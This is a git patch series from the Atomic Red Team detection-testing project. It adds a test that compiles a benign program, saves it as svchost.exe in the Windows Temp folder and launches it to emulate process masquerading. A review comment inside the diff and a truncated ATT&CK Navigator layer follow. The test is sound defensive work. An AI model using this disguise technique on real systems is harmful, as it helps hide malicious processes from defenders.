From 4ace9f41d2d1963ef483f988029053223cae0b38 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+Adam-Mashinchi@users.noreply.github.com> Date: Thu, 3 Mar 2022 20:33:27 -0800 Subject: [PATCH 01/83] Update T1036.005.yaml (#1795) Cleanup file and add new test "Masquerade" test. Co-authored-by: Carrie Roberts --- atomics/T1036.005/T1036.005.yaml | 29 ++++++++++++++++++++++++----- 1 file changed, 24 insertions(+), 5 deletions(-) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 2dc6b7b9..69d6b849 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -1,23 +1,18 @@ ---- attack_technique: T1036.005 display_name: 'Masquerading: Match Legitimate Name or Location' - atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory. auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - supported_platforms: - macos - linux - input_arguments: test_message: description: Test message to echo out to the screen type: String default: Hello from the Atomic Red Team test T1036.005#1 - executor: name: sh elevation_required: false 
@@ -28,3 +23,27 @@ atomic_tests: cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ +- name: Masquerade as a built-in system executable + description: | + Launch an executable that attempts to masquerade as a legitimate executable. + supported_platforms: + - windows + input_arguments: + executable_filepath: + description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. + type: String + default: $Env:windir\Temp\svchost.exe + executor: + command: | + Add-Type -TypeDefinition @' + public class Test { + public static void Main(string[] args) { + System.Console.WriteLine("tweet, tweet"); + } + } + '@ -OutputAssembly "#{executable_filepath}" + + Start-Process -FilePath "#{executable_filepath}" + cleanup_command: | + Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore + name: powershell From b355887a3c34685af7c88e393c32fcb45ae8379e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Mar 2022 04:34:02 +0000 Subject: [PATCH 02/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1036.005/T1036.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 69d6b849..99b00201 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -24,6 +24,7 @@ atomic_tests: rm -f $HOME/.../sh rmdir $HOME/.../ - name: Masquerade as a built-in system executable + auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca description: | Launch an executable that attempts to masquerade as a legitimate executable. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 54518a08..9ae01810 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
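Review bot: The new executor compiles with `-OutputAssembly` but no `-OutputType`, and unless I am misreading Add-Type's default (Library), the file written as svchost.exe is a DLL-shaped assembly that `Start-Process` will refuse to launch, so the masquerading process this test exists to produce may never appear for detection. Pass `-OutputType ConsoleApplication` on the `'@ -OutputAssembly "#{executable_filepath}"` line, and launch with `Start-Process -FilePath "#{executable_filepath}" -Wait` so the executor returns only after the process has exited and the cleanup's `Remove-Item` cannot race a still-running image. The sibling test in this file declares `elevation_required: false` explicitly while the new one declares nothing; `$Env:windir\Temp` is creatable-by-Users on a default install but is not a per-user directory, so state the expectation rather than relying on the schema default. It would also help analysts to say in the description that the dropped binary carries a system name but is unsigned and lives outside System32, which is exactly what path- or signer-based masquerading detections should key on.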
@@ -880,3 +880,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd 12631354-fdbc-4164-92be-402527e748da 5fc528dd-79de-47f5-8188-25572b7fafe0 e895677d-4f06-49ab-91b6-ae3742d0a2ba +35eb8d16-9820-4423-a2a1-90c4f5edd9ca From a3717a8c52a20b58d75e9c5785b36c6561ff15fe Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Mar 2022 04:34:08 +0000 Subject: [PATCH 03/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 30 ++++++++++++ atomics/T1036.005/T1036.005.md | 47 +++++++++++++++++++ 8 files changed, 84 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index df0d8122..6cc97475 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View 
